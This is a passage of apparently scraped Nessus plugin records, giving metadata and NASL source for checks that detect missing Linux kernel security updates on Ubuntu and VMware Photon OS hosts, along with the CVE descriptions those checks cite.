Inc. / NASL script (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04 / 18.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n rm_kb_item(name:'Host/uptrack-uname-r');\n cve_list = make_list('CVE-2020-25669', 'CVE-2020-27815', 'CVE-2020-27830', 'CVE-2020-28941', 'CVE-2020-29374', 'CVE-2020-29568', 'CVE-2020-29569', 'CVE-2020-29660', 'CVE-2020-29661');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-4749-1');\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\npkgs = [\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-1065-oracle', 'pkgver': '4.15.0-1065.73~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-1093-gcp', 'pkgver': '4.15.0-1093.106~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-1094-aws', 'pkgver': '4.15.0-1094.101~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-1108-azure', 'pkgver': '4.15.0-1108.120~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-136-generic', 'pkgver': '4.15.0-136.140~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-136-generic-lpae', 'pkgver': '4.15.0-136.140~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-4.15.0-136-lowlatency', 'pkgver': '4.15.0-136.140~16.04.1'},\n {'osver': '16.04', 'pkgname': 'linux-image-aws-hwe', 'pkgver': '4.15.0.1094.87'},\n {'osver': '16.04', 'pkgname': 'linux-image-azure', 'pkgver': '4.15.0.1108.99'},\n {'osver': '16.04', 'pkgname': 'linux-image-azure-edge', 'pkgver': '4.15.0.1108.99'},\n {'osver': '16.04', 'pkgname': 'linux-image-gcp', 'pkgver': '4.15.0.1093.94'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-hwe-16.04', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-hwe-16.04-edge', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae-hwe-16.04', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-generic-lpae-hwe-16.04-edge', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-gke', 'pkgver': '4.15.0.1093.94'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency-hwe-16.04', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-lowlatency-hwe-16.04-edge', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-oem', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-oracle', 'pkgver': '4.15.0.1065.53'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual-hwe-16.04', 'pkgver': '4.15.0.136.132'},\n {'osver': '16.04', 'pkgname': 'linux-image-virtual-hwe-16.04-edge', 'pkgver': '4.15.0.136.132'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1012-dell300x', 'pkgver': '4.15.0-1012.16'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1065-oracle', 'pkgver': '4.15.0-1065.73'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1079-gke', 'pkgver': '4.15.0-1079.84'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1079-raspi2', 'pkgver': '4.15.0-1079.84'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1085-kvm', 'pkgver': '4.15.0-1085.87'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1093-gcp', 'pkgver': '4.15.0-1093.106'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1094-aws', 'pkgver': '4.15.0-1094.101'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1096-snapdragon', 'pkgver': '4.15.0-1096.105'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-1108-azure', 'pkgver': '4.15.0-1108.120'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-136-generic', 'pkgver': '4.15.0-136.140'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-136-generic-lpae', 'pkgver': '4.15.0-136.140'},\n {'osver': '18.04', 'pkgname': 'linux-image-4.15.0-136-lowlatency', 'pkgver': '4.15.0-136.140'},\n {'osver': '18.04', 'pkgname': 'linux-image-aws-lts-18.04', 'pkgver': '4.15.0.1094.97'},\n {'osver': '18.04', 'pkgname': 'linux-image-azure-lts-18.04', 'pkgver': '4.15.0.1108.81'},\n {'osver': '18.04', 'pkgname': 'linux-image-dell300x', 'pkgver': '4.15.0.1012.14'},\n {'osver': '18.04', 'pkgname': 'linux-image-gcp-lts-18.04', 'pkgver': '4.15.0.1093.111'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-hwe-16.04', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-hwe-16.04-edge', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-lpae', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-lpae-hwe-16.04', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-generic-lpae-hwe-16.04-edge', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-gke', 'pkgver': '4.15.0.1079.83'},\n {'osver': '18.04', 'pkgname': 'linux-image-gke-4.15', 'pkgver': '4.15.0.1079.83'},\n {'osver': '18.04', 'pkgname': 'linux-image-kvm', 'pkgver': '4.15.0.1085.81'},\n {'osver': '18.04', 'pkgname': 'linux-image-lowlatency', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-lowlatency-hwe-16.04', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-lowlatency-hwe-16.04-edge', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-oracle-lts-18.04', 'pkgver': '4.15.0.1065.75'},\n {'osver': '18.04', 'pkgname': 'linux-image-raspi2', 'pkgver': '4.15.0.1079.76'},\n {'osver': '18.04', 'pkgname': 'linux-image-snapdragon', 'pkgver': '4.15.0.1096.99'},\n {'osver': '18.04', 'pkgname': 'linux-image-virtual', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-virtual-hwe-16.04', 'pkgver': '4.15.0.136.123'},\n {'osver': '18.04', 'pkgname': 'linux-image-virtual-hwe-16.04-edge', 'pkgver': '4.15.0.136.123'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux-image-4.15.0-1012-dell300x / linux-image-4.15.0-1065-oracle / etc');\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-01T21:29:20", "description": "An update of the linux package has been released.", "edition": 1, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-09-30T00:00:00", "title": "Photon OS 2.0: Linux PHSA-2020-2.0-0287", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19816", "CVE-2019-19813"], "modified": "2020-09-30T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2020-2_0-0287_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/141098", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-2.0-0287. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141098);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/01\");\n\n script_cve_id(\"CVE-2019-19813\", \"CVE-2019-19816\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2020-2.0-0287\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-287.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19816\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-devel-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-docs-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-drivers-gpu-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-oprofile-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-aws-sound-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-devel-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-docs-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-drivers-gpu-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-esx-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-esx-devel-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-esx-docs-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-oprofile-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-devel-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-docs-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-secure-lkcm-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-sound-4.9.228-8.ph2')) flag++;\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'linux-tools-4.9.228-8.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-25T15:23:51", "description": "The remote Ubuntu 18.04 LTS / 20.04 LTS host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the USN-4750-1 advisory.\n\n - An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9.\n Local attackers on systems with the speakup driver could cause a local denial of service attack, aka\n CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once.\n (CVE-2020-28941)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-23T00:00:00", "title": "Ubuntu 18.04 LTS / 20.04 LTS : Linux kernel vulnerabilities (USN-4750-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-28588", "CVE-2020-27830", "CVE-2020-27815", "CVE-2020-25669", "CVE-2020-28941", "CVE-2020-29569", "CVE-2020-29568", "CVE-2021-20177", "CVE-2020-29661", "CVE-2020-29660"], "modified": "2021-03-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2-hwe-18.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1040-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1038-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem-osp1", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1033-kvm", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-virtual-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi-hwe-18.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon-hwe-18.04-edge", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-5.4", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1010-gkeop", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gkeop-5.4", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-66-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1037-gcp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi-hwe-18.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-66-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-66-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oracle", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1038-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1036-gke", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04-edge", "p-cpe:/a:canonical:ubuntu_linux:linux-image-gkeop", "p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1029-raspi", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-azure", "p-cpe:/a:canonical:ubuntu_linux:linux-image-oem", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-4750-1.NASL", "href": "https://www.tenable.com/plugins/nessus/148009", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4750-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148009);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/24\");\n\n script_cve_id(\n \"CVE-2020-25669\",\n \"CVE-2020-27815\",\n \"CVE-2020-27830\",\n \"CVE-2020-28588\",\n \"CVE-2020-28941\",\n \"CVE-2020-29568\",\n \"CVE-2020-29569\",\n \"CVE-2020-29660\",\n \"CVE-2020-29661\",\n \"CVE-2021-20177\"\n );\n script_xref(name:\"USN\", value:\"4750-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS : Linux kernel vulnerabilities (USN-4750-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS / 20.04 LTS host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the USN-4750-1 advisory.\n\n - An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9.\n Local attackers on systems with the speakup driver could cause a local denial of service attack, aka\n CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once.\n (CVE-2020-28941)\n\n - An issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are\n processing watch events using a single thread. If the events are received faster than the thread is able\n to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the\n backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\n - An issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux\n kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped.\n However, the handler may not have time to run if the frontend quickly toggles between the states connect\n and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving\n guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege\n escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback.\n (CVE-2020-29569)\n\n - A locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID,\n aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\n - A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13.\n drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.\n (CVE-2020-29661)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4750-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29661\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1010-gkeop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1029-raspi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1033-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1036-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1037-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1038-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1038-oracle\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-1040-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-66-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-66-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-5.4.0-66-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-azure-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-18.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-18.04-edge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke-5.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gkeop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gkeop-5.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-18.04\");\n 